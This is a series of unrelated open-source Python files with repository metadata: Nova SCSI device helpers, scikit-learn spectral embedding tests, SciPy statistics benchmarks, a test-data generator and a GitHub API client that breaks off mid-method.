                  process_input=content, run_as_root=True)
def rescan_hosts(hbas):
    """Trigger a scsi bus rescan on every given HBA's host device."""
    for hba in hbas:
        scan_path = "/sys/class/scsi_host/%s/scan" % hba['host_device']
        echo_scsi_command(scan_path, "- - -")
def get_device_list():
    """Return the scsi device names reported by ``sginfo -r``."""
    (out, _err) = utils.execute('sginfo', '-r', run_as_root=True)
    if not out:
        return []
    return out.strip().split(" ")
def get_device_info(device):
    # Probe *device* with sg_scan and parse its host/channel/id/lun address.
    # Assumes output of the form "<device>: scsiN channel=C id=I lun=L"
    # (TODO confirm exact format on target platforms).
    (out, err) = utils.execute('sg_scan', device, run_as_root=True)
    dev_info = {'device': device, 'host': None,
                'channel': None, 'id': None, 'lun': None}
    if out:
        line = out.strip()
        # Drop the leading "<device>: " prefix so only the fields remain.
        line = line.replace(device + ": ", "")
        info = line.split(" ")
        for item in info:
            if '=' in item:
                # key=value tokens (channel=, id=, lun=) map straight into
                # the result dict.
                pair = item.split('=')
                dev_info[pair[0]] = pair[1]
            elif 'scsi' in item:
                # The adapter number is encoded as e.g. "scsi0".
                dev_info['host'] = item.replace('scsi', '')
    return dev_info
def _wait_for_remove(device, tries):
    # Ask the kernel to delete *device*; raise LoopingCallDone once it is
    # gone.  Driven repeatedly by remove_device's FixedIntervalLoopingCall.
    # NOTE(review): 'tries' is passed by value from remove_device, so this
    # increment never persists across invocations -- the log line appears
    # to always report the same count.  Confirm before relying on it.
    tries = tries + 1
    LOG.debug(_("Trying (%(tries)s) to remove device %(device)s")
              % {'tries': tries, 'device': device["device"]})
    # Echo "1" into the device's sysfs delete node to request removal.
    path = "/sys/bus/scsi/drivers/sd/%s:%s:%s:%s/delete"
    echo_scsi_command(path % (device["host"], device["channel"],
                              device["id"], device["lun"]),
                      "1")
    devices = get_device_list()
    if device["device"] not in devices:
        # Device no longer listed: stop the looping call.
        raise utils.LoopingCallDone()
def remove_device(device):
    """Repeatedly ask the kernel to delete *device* until it disappears
    from the scsi device list (polled every 2 seconds)."""
    loop = utils.FixedIntervalLoopingCall(_wait_for_remove, device, 0)
    loop.start(interval=2).wait()
    loop.stop()
def find_multipath_device(device):
    """Try and discover the multipath device for a volume."""
    mdev = None
    devices = []
    out = None
    try:
        (out, err) = utils.execute('multipath', '-l', device,
                                   run_as_root=True)
    except exception.ProcessExecutionError as exc:
        # Best effort: a failed multipath call just means "no mdev found".
        LOG.warn(_("Multipath call failed exit (%(code)s)")
                 % {'code': exc.exit_code})
        return None
    if out:
        lines = out.strip()
        lines = lines.split("\n")
        if lines:
            # The first line names the multipath map; find the "dm-N"
            # token, whose position varies with /etc/multipath.conf.
            line = lines[0]
            info = line.split(" ")
            # device line output is different depending
            # on /etc/multipath.conf settings.
            if info[1][:2] == "dm":
                mdev = "/dev/%s" % info[1]
            elif info[2][:2] == "dm":
                mdev = "/dev/%s" % info[2]
            if mdev is None:
                LOG.warn(_("Couldn't find multipath device %(line)s")
                         % locals())
                return None
            LOG.debug(_("Found multipath device = %(mdev)s") % locals())
            # Individual path entries start a few lines down; each "policy"
            # line carries "H:C:I:L <devname>" for one path.
            device_lines = lines[3:]
            for dev_line in device_lines:
                dev_line = dev_line.strip()
                # Strip the tree-drawing prefix characters.
                dev_line = dev_line[3:]
                dev_info = dev_line.split(" ")
                if dev_line.find("policy") != -1:
                    address = dev_info[0].split(":")
                    dev = {'device': '/dev/%s' % dev_info[1],
                           'host': address[0], 'channel': address[1],
                           'id': address[2], 'lun': address[3]
                           }
                    devices.append(dev)
    if mdev is not None:
        # Return the map device plus each underlying path device.
        info = {"device": mdev,
                "devices": devices}
        return info
    return None
| {
"content_hash": "c8bc74fb125fb9826c75206ba6416606",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 75,
"avg_line_length": 31.040650406504064,
"alnum_prop": 0.5041906757464641,
"repo_name": "gspilio/nova",
"id": "739092b2e8d03424aef9236730ec9f8753ac2af6",
"size": "4501",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "nova/storage/linuxscsi.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "7403"
},
{
"name": "Python",
"bytes": "9099328"
},
{
"name": "Shell",
"bytes": "17117"
}
],
"symlink_target": ""
} |
import pytest
import numpy as np
from scipy import sparse
from scipy.sparse import csgraph
from scipy.linalg import eigh
from sklearn.manifold.spectral_embedding_ import SpectralEmbedding
from sklearn.manifold.spectral_embedding_ import _graph_is_connected
from sklearn.manifold.spectral_embedding_ import _graph_connected_component
from sklearn.manifold import spectral_embedding
from sklearn.metrics.pairwise import rbf_kernel
from sklearn.metrics import normalized_mutual_info_score
from sklearn.cluster import KMeans
from sklearn.datasets.samples_generator import make_blobs
from sklearn.utils.extmath import _deterministic_vector_sign_flip
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_true, assert_equal, assert_raises
from sklearn.utils.testing import SkipTest
# Non-centered, sparse centers used to generate the shared blob dataset
# exercised by most of the tests below.
centers = np.array([
    [0.0, 5.0, 0.0, 0.0, 0.0],
    [0.0, 0.0, 4.0, 0.0, 0.0],
    [1.0, 0.0, 0.0, 5.0, 1.0],
])
n_samples = 1000
n_clusters, n_features = centers.shape
# S: (n_samples, n_features) data; true_labels: ground-truth cluster ids.
S, true_labels = make_blobs(n_samples=n_samples, centers=centers,
                            cluster_std=1., random_state=42)
def _check_with_col_sign_flipping(A, B, tol=0.0):
""" Check array A and B are equal with possible sign flipping on
each columns"""
sign = True
for column_idx in range(A.shape[1]):
sign = sign and ((((A[:, column_idx] -
B[:, column_idx]) ** 2).mean() <= tol ** 2) or
(((A[:, column_idx] +
B[:, column_idx]) ** 2).mean() <= tol ** 2))
if not sign:
return False
return True
def test_sparse_graph_connected_component():
    # Build several disjoint groups of nodes, connect each group internally,
    # and check _graph_connected_component recovers exactly each group.
    rng = np.random.RandomState(42)
    n_samples = 300
    boundaries = [0, 42, 121, 200, n_samples]
    p = rng.permutation(n_samples)
    connections = []
    for start, stop in zip(boundaries[:-1], boundaries[1:]):
        group = p[start:stop]
        # Connect all elements within the group at least once via an
        # arbitrary path that spans the group.
        for i in range(len(group) - 1):
            connections.append((group[i], group[i + 1]))
        # Add some more random connections within the group
        min_idx, max_idx = 0, len(group) - 1
        n_random_connections = 1000
        source = rng.randint(min_idx, max_idx, size=n_random_connections)
        target = rng.randint(min_idx, max_idx, size=n_random_connections)
        connections.extend(zip(group[source], group[target]))
    # Build a symmetric affinity matrix
    row_idx, column_idx = tuple(np.array(connections).T)
    data = rng.uniform(.1, 42, size=len(connections))
    affinity = sparse.coo_matrix((data, (row_idx, column_idx)))
    affinity = 0.5 * (affinity + affinity.T)
    for start, stop in zip(boundaries[:-1], boundaries[1:]):
        component_1 = _graph_connected_component(affinity, p[start])
        component_size = stop - start
        assert_equal(component_1.sum(), component_size)
        # We should retrieve the same component mask by starting by both ends
        # of the group
        component_2 = _graph_connected_component(affinity, p[stop - 1])
        assert_equal(component_2.sum(), component_size)
        assert_array_equal(component_1, component_2)
def test_spectral_embedding_two_components(seed=36):
    # Test spectral embedding with two components
    random_state = np.random.RandomState(seed)
    n_sample = 100
    affinity = np.zeros(shape=[n_sample * 2, n_sample * 2])
    # first component
    affinity[0:n_sample,
             0:n_sample] = np.abs(random_state.randn(n_sample, n_sample)) + 2
    # second component
    affinity[n_sample::,
             n_sample::] = np.abs(random_state.randn(n_sample, n_sample)) + 2
    # Test of internal _graph_connected_component before connection
    component = _graph_connected_component(affinity, 0)
    assert_true(component[:n_sample].all())
    assert_true(not component[n_sample:].any())
    component = _graph_connected_component(affinity, -1)
    assert_true(not component[:n_sample].any())
    assert_true(component[n_sample:].all())
    # connection: link one node of each block, zero the diagonal and
    # re-symmetrise so the graph becomes a single component
    affinity[0, n_sample + 1] = 1
    affinity[n_sample + 1, 0] = 1
    affinity.flat[::2 * n_sample + 1] = 0
    affinity = 0.5 * (affinity + affinity.T)
    true_label = np.zeros(shape=2 * n_sample)
    true_label[0:n_sample] = 1
    se_precomp = SpectralEmbedding(n_components=1, affinity="precomputed",
                                   random_state=np.random.RandomState(seed))
    embedded_coordinate = se_precomp.fit_transform(affinity)
    # Some numpy versions are touchy with types
    embedded_coordinate = \
        se_precomp.fit_transform(affinity.astype(np.float32))
    # thresholding on the first components using 0: the sign of the first
    # non-trivial eigenvector should separate the two blocks perfectly.
    label_ = np.array(embedded_coordinate.ravel() < 0, dtype="float")
    assert_equal(normalized_mutual_info_score(true_label, label_), 1.0)
def test_spectral_embedding_precomputed_affinity(seed=36):
    # Test spectral embedding with precomputed kernel
    gamma = 1.0
    se_precomp = SpectralEmbedding(n_components=2, affinity="precomputed",
                                   random_state=np.random.RandomState(seed))
    se_rbf = SpectralEmbedding(n_components=2, affinity="rbf",
                               gamma=gamma,
                               random_state=np.random.RandomState(seed))
    embed_precomp = se_precomp.fit_transform(rbf_kernel(S, gamma=gamma))
    embed_rbf = se_rbf.fit_transform(S)
    # Same kernel either way, so the affinity matrices must match and the
    # embeddings must agree up to per-column sign flips.
    assert_array_almost_equal(
        se_precomp.affinity_matrix_, se_rbf.affinity_matrix_)
    assert_true(_check_with_col_sign_flipping(embed_precomp, embed_rbf, 0.05))
def test_spectral_embedding_callable_affinity(seed=36):
    # Test spectral embedding with callable affinity
    gamma = 0.9
    kern = rbf_kernel(S, gamma=gamma)
    se_callable = SpectralEmbedding(n_components=2,
                                    affinity=(
                                        lambda x: rbf_kernel(x, gamma=gamma)),
                                    gamma=gamma,
                                    random_state=np.random.RandomState(seed))
    se_rbf = SpectralEmbedding(n_components=2, affinity="rbf",
                               gamma=gamma,
                               random_state=np.random.RandomState(seed))
    embed_rbf = se_rbf.fit_transform(S)
    embed_callable = se_callable.fit_transform(S)
    # The callable computes the same rbf kernel, so affinities and
    # embeddings (up to sign flips) must match the built-in "rbf" mode.
    assert_array_almost_equal(
        se_callable.affinity_matrix_, se_rbf.affinity_matrix_)
    assert_array_almost_equal(kern, se_rbf.affinity_matrix_)
    assert_true(
        _check_with_col_sign_flipping(embed_rbf, embed_callable, 0.05))
def test_spectral_embedding_amg_solver(seed=36):
    # Test spectral embedding with amg solver
    try:
        from pyamg import smoothed_aggregation_solver # noqa
    except ImportError:
        raise SkipTest("pyamg not available.")
    # The amg and arpack eigen-solvers should produce the same embedding
    # up to per-column sign flips.
    se_amg = SpectralEmbedding(n_components=2, affinity="nearest_neighbors",
                               eigen_solver="amg", n_neighbors=5,
                               random_state=np.random.RandomState(seed))
    se_arpack = SpectralEmbedding(n_components=2, affinity="nearest_neighbors",
                                  eigen_solver="arpack", n_neighbors=5,
                                  random_state=np.random.RandomState(seed))
    embed_amg = se_amg.fit_transform(S)
    embed_arpack = se_arpack.fit_transform(S)
    assert_true(_check_with_col_sign_flipping(embed_amg, embed_arpack, 0.05))
def test_pipeline_spectral_clustering(seed=36):
    # Test using pipeline to do spectral clustering
    random_state = np.random.RandomState(seed)
    se_rbf = SpectralEmbedding(n_components=n_clusters,
                               affinity="rbf",
                               random_state=random_state)
    se_knn = SpectralEmbedding(n_components=n_clusters,
                               affinity="nearest_neighbors",
                               n_neighbors=5,
                               random_state=random_state)
    for se in [se_rbf, se_knn]:
        # KMeans on the embedded space should recover the true blob
        # labels almost perfectly (NMI close to 1, checked to 2 decimals).
        km = KMeans(n_clusters=n_clusters, random_state=random_state)
        km.fit(se.fit_transform(S))
        assert_array_almost_equal(
            normalized_mutual_info_score(
                km.labels_,
                true_labels), 1.0, 2)
def test_spectral_embedding_unknown_eigensolver(seed=36):
    # SpectralEmbedding must reject an unrecognised eigen_solver value.
    embedder = SpectralEmbedding(eigen_solver="<unknown>",
                                 n_components=1,
                                 affinity="precomputed",
                                 random_state=np.random.RandomState(seed))
    assert_raises(ValueError, embedder.fit, S)
def test_spectral_embedding_unknown_affinity(seed=36):
    # SpectralEmbedding must reject an unrecognised affinity value.
    embedder = SpectralEmbedding(affinity="<unknown>",
                                 n_components=1,
                                 random_state=np.random.RandomState(seed))
    assert_raises(ValueError, embedder.fit, S)
def test_connectivity(seed=36):
    # Graph connectivity check: a two-component graph vs a single chain,
    # in dense and both sparse representations.
    disconnected = np.array([[1, 0, 0, 0, 0],
                             [0, 1, 1, 0, 0],
                             [0, 1, 1, 1, 0],
                             [0, 0, 1, 1, 1],
                             [0, 0, 0, 1, 1]])
    connected = np.array([[1, 1, 0, 0, 0],
                          [1, 1, 1, 0, 0],
                          [0, 1, 1, 1, 0],
                          [0, 0, 1, 1, 1],
                          [0, 0, 0, 1, 1]])
    for graph, expected in ((disconnected, False), (connected, True)):
        assert_equal(_graph_is_connected(graph), expected)
        assert_equal(_graph_is_connected(sparse.csr_matrix(graph)), expected)
        assert_equal(_graph_is_connected(sparse.csc_matrix(graph)), expected)
def test_spectral_embedding_deterministic():
    # Two runs over the same affinity matrix must give identical embeddings.
    rng = np.random.RandomState(36)
    sims = rbf_kernel(rng.randn(10, 30))
    first = spectral_embedding(sims)
    second = spectral_embedding(sims)
    assert_array_almost_equal(first, second)
def test_spectral_embedding_unnormalized():
    # Test that spectral_embedding is also processing unnormalized laplacian
    # correctly
    random_state = np.random.RandomState(36)
    data = random_state.randn(10, 30)
    sims = rbf_kernel(data)
    n_components = 8
    embedding_1 = spectral_embedding(sims,
                                     norm_laplacian=False,
                                     n_components=n_components,
                                     drop_first=False)
    # Verify using manual computation with dense eigh
    laplacian, dd = csgraph.laplacian(sims, normed=False,
                                      return_diag=True)
    _, diffusion_map = eigh(laplacian)
    # Take the first n_components eigenvectors as rows.
    embedding_2 = diffusion_map.T[:n_components]
    # Fix the eigenvector signs deterministically before comparing.
    embedding_2 = _deterministic_vector_sign_flip(embedding_2).T
    assert_array_almost_equal(embedding_1, embedding_2)
def test_spectral_embedding_first_eigen_vector():
    # Test that the first eigenvector of spectral_embedding
    # is constant and that the second is not (for a connected graph)
    random_state = np.random.RandomState(36)
    data = random_state.randn(10, 30)
    sims = rbf_kernel(data)
    n_components = 2
    # Repeat across solver seeds to make sure the property is not an
    # artefact of one random initialisation.
    for seed in range(10):
        embedding = spectral_embedding(sims,
                                       norm_laplacian=False,
                                       n_components=n_components,
                                       drop_first=False,
                                       random_state=seed)
        # First component: constant vector (std ~ 0); second: non-trivial.
        assert np.std(embedding[:, 0]) == pytest.approx(0)
        assert np.std(embedding[:, 1]) > 1e-3
| {
"content_hash": "19e8b0cd909f95cd0722458256b58e5c",
"timestamp": "",
"source": "github",
"line_count": 285,
"max_line_length": 79,
"avg_line_length": 41.694736842105264,
"alnum_prop": 0.6159219052427838,
"repo_name": "BiaDarkia/scikit-learn",
"id": "bc32b58c6e7ffc5b729230e95d7f6b33bc570893",
"size": "11883",
"binary": false,
"copies": "13",
"ref": "refs/heads/master",
"path": "sklearn/manifold/tests/test_spectral_embedding.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "394787"
},
{
"name": "C++",
"bytes": "140225"
},
{
"name": "Makefile",
"bytes": "1588"
},
{
"name": "PowerShell",
"bytes": "17312"
},
{
"name": "Python",
"bytes": "6330849"
},
{
"name": "Shell",
"bytes": "6748"
}
],
"symlink_target": ""
} |
from model.group import Group
from random import randrange
def test_delete_some_group(app):
    # Make sure at least one group exists before attempting a deletion.
    if app.group.count() == 0:
        app.group.create(Group(name="test"))
    old_groups = app.group.get_group_list()
    index = randrange(len(old_groups))
    app.group.delete_group_by_index(index)
    new_groups = app.group.get_group_list()
    # Exactly one group fewer, and the survivors are the old list minus
    # the deleted entry.
    assert len(new_groups) == len(old_groups) - 1
    expected = old_groups[:index] + old_groups[index + 1:]
    assert expected == new_groups
"content_hash": "7b0f79f46338ec2267c498f8949216f8",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 45,
"avg_line_length": 34.07692307692308,
"alnum_prop": 0.6952595936794582,
"repo_name": "ritatsetsko/python_training",
"id": "c9d54db1171e918958a376b3f28813f43133d3b8",
"size": "443",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_del_group.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13917"
}
],
"symlink_target": ""
} |
"""Generates test input data for Causomatic that tries to mimic the scale of
Causes' datasets for scoring algorithm performance benchmarking. In particular,
this will generate a few *very large* sets, more sets with 10x less users, ad
nauseum"""
import random
if __name__ == '__main__':
# generate a nice, decreasing distribution
set_sizes = [((10 ** i),) * (10 - i) for i in range(7, 0, -1)]
# flatten the list
set_sizes = [item for sublist in set_sizes for item in sublist]
print "set sizes: %s" % str(set_sizes)
id_upper_bound = 2 * 10 ** 7
print "building user_ids from 0 to %d" % id_upper_bound
user_ids = range(id_upper_bound)
print "finished building user_id set, generating memberships"
with open('sample.data', 'wb+') as fh:
for set_id, set_size in enumerate(set_sizes, start=1):
print "Building user ids for set size %d" % set_size
random.shuffle(user_ids)
print "Writing results to sample.data..."
fh.write(
''.join('%d,%d\n' % (user_id, set_id)
for user_id in user_ids[:set_size]))
| {
"content_hash": "7e53db477fa034c056b4ea0a17a9a5b1",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 79,
"avg_line_length": 37.3448275862069,
"alnum_prop": 0.6472760849492152,
"repo_name": "causes/suggestomatic",
"id": "ef1829b3e169c8c581234a6aa0aad063d9433436",
"size": "1083",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "generate_performance_data.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "8096"
},
{
"name": "Python",
"bytes": "15659"
}
],
"symlink_target": ""
} |
import warnings
import numpy as np
try:
import scipy.stats as stats
except ImportError:
pass
from .common import Benchmark
class Anderson_KSamp(Benchmark):
    # Benchmark scipy.stats.anderson_ksamp on three shifted normal samples.
    def setup(self, *args):
        # Three samples of 1000 draws with means 0, 1 and 2.
        self.rand = [np.random.normal(loc=i, size=1000) for i in range(3)]
    def time_anderson_ksamp(self):
        with warnings.catch_warnings():
            # Silence expected UserWarnings so they do not skew the timing.
            warnings.simplefilter('ignore', UserWarning)
            stats.anderson_ksamp(self.rand)
class CorrelationFunctions(Benchmark):
    # Benchmark scipy.stats.fisher_exact for each alternative hypothesis.
    param_names = ['alternative']
    params = [
        ['two-sided', 'less', 'greater']
    ]
    def setup(self, mode):
        # Random 2x2 contingency table; note no fixed seed is set here.
        a = np.random.rand(2,2) * 10
        self.a = a
    def time_fisher_exact(self, alternative):
        oddsratio, pvalue = stats.fisher_exact(self.a, alternative=alternative)
class InferentialStats(Benchmark):
    # Benchmark independent-sample t-tests on samples of differing size
    # and variance.
    def setup(self):
        np.random.seed(12345678)
        self.a = stats.norm.rvs(loc=5, scale=10, size=500)
        # b and c are small samples; c has double the scale of b.
        self.b = stats.norm.rvs(loc=8, scale=10, size=20)
        self.c = stats.norm.rvs(loc=8, scale=20, size=20)
    def time_ttest_ind_same_var(self):
        # test different sized sample with variances
        stats.ttest_ind(self.a, self.b)
        stats.ttest_ind(self.a, self.b, equal_var=False)
    def time_ttest_ind_diff_var(self):
        # test different sized sample with different variances
        stats.ttest_ind(self.a, self.c)
        stats.ttest_ind(self.a, self.c, equal_var=False)
class Distribution(Benchmark):
    # Benchmark pdf/cdf/rvs/fit for a few representative distributions.
    param_names = ['distribution', 'properties']
    params = [
        ['cauchy', 'gamma', 'beta'],
        ['pdf', 'cdf', 'rvs', 'fit']
    ]
    def setup(self, distribution, properties):
        np.random.seed(12345678)
        self.x = np.random.rand(100)
    def time_distribution(self, distribution, properties):
        # Dispatch on (distribution, properties); shape parameters differ
        # per distribution, hence the explicit branches.
        if distribution == 'gamma':
            if properties == 'pdf':
                stats.gamma.pdf(self.x, a=5, loc=4, scale=10)
            elif properties == 'cdf':
                stats.gamma.cdf(self.x, a=5, loc=4, scale=10)
            elif properties == 'rvs':
                stats.gamma.rvs(size=1000, a=5, loc=4, scale=10)
            elif properties == 'fit':
                stats.gamma.fit(self.x, loc=4, scale=10)
        elif distribution == 'cauchy':
            if properties == 'pdf':
                stats.cauchy.pdf(self.x, loc=4, scale=10)
            elif properties == 'cdf':
                stats.cauchy.cdf(self.x, loc=4, scale=10)
            elif properties == 'rvs':
                stats.cauchy.rvs(size=1000, loc=4, scale=10)
            elif properties == 'fit':
                stats.cauchy.fit(self.x, loc=4, scale=10)
        elif distribution == 'beta':
            if properties == 'pdf':
                stats.beta.pdf(self.x, a=5, b=3, loc=4, scale=10)
            elif properties == 'cdf':
                stats.beta.cdf(self.x, a=5, b=3, loc=4, scale=10)
            elif properties == 'rvs':
                stats.beta.rvs(size=1000, a=5, b=3, loc=4, scale=10)
            elif properties == 'fit':
                stats.beta.fit(self.x, loc=4, scale=10)
    # Retain old benchmark results (remove this if changing the benchmark)
    time_distribution.version = "fb22ae5386501008d945783921fe44aef3f82c1dafc40cddfaccaeec38b792b0"
class DescriptiveStats(Benchmark):
    # Benchmark scipy.stats.mode over integer data of varying cardinality.
    param_names = ['n_levels']
    params = [
        [10, 1000]
    ]
    def setup(self, n_levels):
        np.random.seed(12345678)
        # 1000 observations of 10 variables, values in [0, n_levels).
        self.levels = np.random.randint(n_levels, size=(1000, 10))
    def time_mode(self, n_levels):
        stats.mode(self.levels, axis=0)
class GaussianKDE(Benchmark):
    # Benchmark gaussian_kde evaluation over a 2-D sample.
    def setup(self):
        np.random.seed(12345678)
        n = 2000
        m1 = np.random.normal(size=n)
        m2 = np.random.normal(scale=0.5, size=n)
        xmin = m1.min()
        xmax = m1.max()
        ymin = m2.min()
        ymax = m2.max()
        # 200x200 evaluation grid spanning the sample's bounding box.
        X, Y = np.mgrid[xmin:xmax:200j, ymin:ymax:200j]
        self.positions = np.vstack([X.ravel(), Y.ravel()])
        values = np.vstack([m1, m2])
        self.kernel = stats.gaussian_kde(values)
    def time_gaussian_kde_evaluate_few_points(self):
        # test gaussian_kde evaluate on a small number of points
        self.kernel(self.positions[:, :10])
    def time_gaussian_kde_evaluate_many_points(self):
        # test gaussian_kde evaluate on many points
        self.kernel(self.positions)
class GroupSampling(Benchmark):
    # Benchmark sampling random matrices from the classical matrix groups
    # at several dimensions.
    param_names = ['dim']
    params = [[3, 10, 50, 200]]
    def setup(self, dim):
        np.random.seed(12345678)
    def time_unitary_group(self, dim):
        stats.unitary_group.rvs(dim)
    def time_ortho_group(self, dim):
        stats.ortho_group.rvs(dim)
    def time_special_ortho_group(self, dim):
        stats.special_ortho_group.rvs(dim)
class BinnedStatistic(Benchmark):
    # Benchmark binned_statistic_dd, with and without reusing a previously
    # computed binning result.
    def setup(self):
        np.random.seed(12345678)
        self.inp = np.random.rand(9999).reshape(3, 3333) * 200
        self.subbin_x_edges = np.arange(0, 200, dtype=np.float32)
        self.subbin_y_edges = np.arange(0, 200, dtype=np.float64)
        # Precomputed result so the reuse benchmark can skip re-binning.
        self.ret = stats.binned_statistic_dd(
            [self.inp[0], self.inp[1]], self.inp[2], statistic="std",
            bins=[self.subbin_x_edges, self.subbin_y_edges])
    def time_binned_statistic_dd_std(self):
        stats.binned_statistic_dd(
            [self.inp[0], self.inp[1]], self.inp[2], statistic="std",
            bins=[self.subbin_x_edges, self.subbin_y_edges])
    def time_binned_statistic_dd_std_reuse_bin(self):
        stats.binned_statistic_dd(
            [self.inp[0], self.inp[1]], self.inp[2], statistic="std",
            binned_statistic_result=self.ret)
| {
"content_hash": "cb07b01f7da576c7c1e2fe52f7863153",
"timestamp": "",
"source": "github",
"line_count": 174,
"max_line_length": 98,
"avg_line_length": 32.55172413793103,
"alnum_prop": 0.591454802259887,
"repo_name": "pizzathief/scipy",
"id": "56ef5ac457d5c9faa7ea25951ae50670f460e1e2",
"size": "5664",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "benchmarks/benchmarks/stats.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4395775"
},
{
"name": "C++",
"bytes": "649767"
},
{
"name": "Dockerfile",
"bytes": "1236"
},
{
"name": "Fortran",
"bytes": "5367672"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Python",
"bytes": "12449825"
},
{
"name": "Shell",
"bytes": "538"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
} |
import os
from typing import Optional
import aiohttp
import link_header
from async_timeout import timeout
import aiogithub
from aiogithub import objects
from aiogithub.objects import response
from aiogithub.exceptions import HttpException
# Default GitHub REST v3 media type, and the opt-in "preview" media type
# sent instead when enable_preview_api is set on the client.
GITHUB_DEFAULT_CONTENT_TYPE = 'application/vnd.github.v3+json'
GITHUB_PREVIEW_CONTENT_TYPE = 'application/vnd.github.black-cat-preview+json'
class GitHub:
    """Asynchronous GitHub REST v3 API client."""

    def __init__(self, token: str = None, items_per_page=100, timeout_secs=10,
                 max_paginated_items=1000, enable_preview_api=False):
        """
        Initialises a GitHub API client.

        If no personal access token is provided, the client will check the
        GITHUB_TOKEN environment variable for a token and use that if
        present. If still without a token, the GitHub API will be used
        unauthenticated.

        :param token: GitHub personal access token
        :param items_per_page: Items to request per page, must be
                               between 1 and 100
        :param timeout_secs: Timeout in seconds for HTTP requests
        :param max_paginated_items: Safety limit for when iterating
                                    through list results to avoid
                                    inadvertently making a huge number of
                                    requests
        :param enable_preview_api: Request the GitHub preview media type
                                   instead of the stable v3 one
        """
        if not token:
            token = os.environ.get('GITHUB_TOKEN')
        content_type = GITHUB_PREVIEW_CONTENT_TYPE if enable_preview_api \
            else GITHUB_DEFAULT_CONTENT_TYPE
        headers = {
            'Accept': content_type,
            'User-Agent': 'aiogithub/{}'.format(aiogithub.__version__)
        }
        if token:
            headers['Authorization'] = 'token ' + token
        self._client = aiohttp.ClientSession(headers=headers)
        self._timeout = timeout_secs
        self._base_url = 'https://api.github.com'
        self._token = token
        self._items_per_page = items_per_page
        self._max_paginated_items = max_paginated_items
        self._last_limits = None

    @property
    def last_rate_limit(self) -> Optional[dict]:
        """
        The rate limits that were sent by GitHub in the most recent
        request.

        :type: Optional[dict]
        """
        return self._last_limits

    async def get_user(self, username, defer_fetch=False) -> objects.User:
        """
        Gets a single user.

        :param username: The name of the user to fetch the details of.
        :param defer_fetch: Whether to defer fetching of data about this user.
        :return: An object representing the user.
        """
        fetch_params = {
            'login': username
        }
        return await self._get_object_relative_url(
            objects.User, defer_fetch=defer_fetch,
            fetch_params=fetch_params)

    async def get_organization(self, username, defer_fetch=False) -> \
            objects.Organization:
        """
        Gets a single organization.

        :param username: The username/login of the organization to fetch the
                         details of.
        :param defer_fetch: Whether to defer fetching of data about this
                            organization.
        :return: An object representing the organization.
        """
        fetch_params = {
            'login': username
        }
        return await self._get_object_relative_url(
            objects.Organization, defer_fetch=defer_fetch,
            fetch_params=fetch_params)

    async def get_repo(self, owner_name, repo_name,
                       defer_fetch=False) -> objects.Repo:
        """
        Gets a single repository.

        :param owner_name: The name of the user or organisation that owns
                           the repository.
        :param repo_name: The name of the repository.
        :param defer_fetch: Whether to defer fetching of data about this
                            repository.
        :return: An object representing the repository.
        """
        fetch_params = {
            'name': repo_name,
            'owner': {
                'login': owner_name
            }
        }
        return await self._get_object_relative_url(
            objects.Repo, defer_fetch=defer_fetch,
            fetch_params=fetch_params)

    async def get_branch(self, owner_name, repo_name,
                         branch_name) -> objects.Branch:
        """
        Gets a single branch of a repository.
        """
        fetch_params = {
            'login': owner_name,
            'repo': repo_name,
            'branch': branch_name
        }
        return await self._get_object_relative_url(objects.Branch,
                                                   fetch_params=fetch_params)

    async def get_issue(self, owner_name, repo_name,
                        issue_number) -> objects.Issue:
        """
        Gets a single issue of a repository.
        """
        fetch_params = {
            'login': owner_name,
            'repo': repo_name,
            'number': issue_number
        }
        return await self._get_object_relative_url(objects.Issue,
                                                   fetch_params=fetch_params)

    async def get_pull_request(self, owner_name, repo_name,
                               issue_number) -> objects.PullRequest:
        """
        Gets a single pull request of a repository.
        """
        fetch_params = {
            'login': owner_name,
            'repo': repo_name,
            'number': issue_number
        }
        return await self._get_object_relative_url(objects.PullRequest,
                                                   fetch_params=fetch_params)

    async def get_rate_limit(self) -> objects.RateLimit:
        """
        Gets the current rate limit values.
        """
        return await self._get_object_relative_url(objects.RateLimit)

    async def get_current_user(self) -> objects.AuthenticatedUser:
        """
        Gets the current authenticated user.
        """
        return objects.AuthenticatedUser(
            self, *await self.get_relative_url('user')
        )

    def get_users(self, since=None) -> \
            objects.PaginatedListProxy[objects.User]:
        """
        Gets all users.
        """
        # FIXME: add since support
        return self.get_list_relative_url('users', objects.User)

    def get_repos(self, since=None) -> \
            objects.PaginatedListProxy[objects.Repo]:
        """
        Gets all repos.
        """
        # FIXME: add since support
        return self.get_list_relative_url('repos', objects.Repo)

    async def close(self) -> None:
        await self._client.close()

    async def __aenter__(self) -> 'GitHub':
        return self

    async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:
        await self.close()

    async def get_absolute_url(self, url, is_paginated=False) -> tuple:
        """
        Performs a GET request and returns (json body, rate limits, links).
        Raises HttpException on any 4xx/5xx status.
        """
        with timeout(self._timeout):
            params = {}
            if is_paginated:
                params['per_page'] = self._items_per_page
            async with self._client.get(
                    url, params=params) as response:
                if response.status >= 400:
                    raise HttpException(response.status, url)
                # BUG FIX: 'remaining' previously read the
                # X-RateLimit-Limit header as well, so it always mirrored
                # 'limit' instead of the actual remaining quota.
                self._last_limits = {
                    'limit': response.headers.get('X-RateLimit-Limit'),
                    'remaining': response.headers.get('X-RateLimit-Remaining')
                }
                # Parse RFC 5988 pagination links (next/prev/first/last).
                link_header_value = response.headers.get('link')
                links_dict = {}
                if link_header_value:
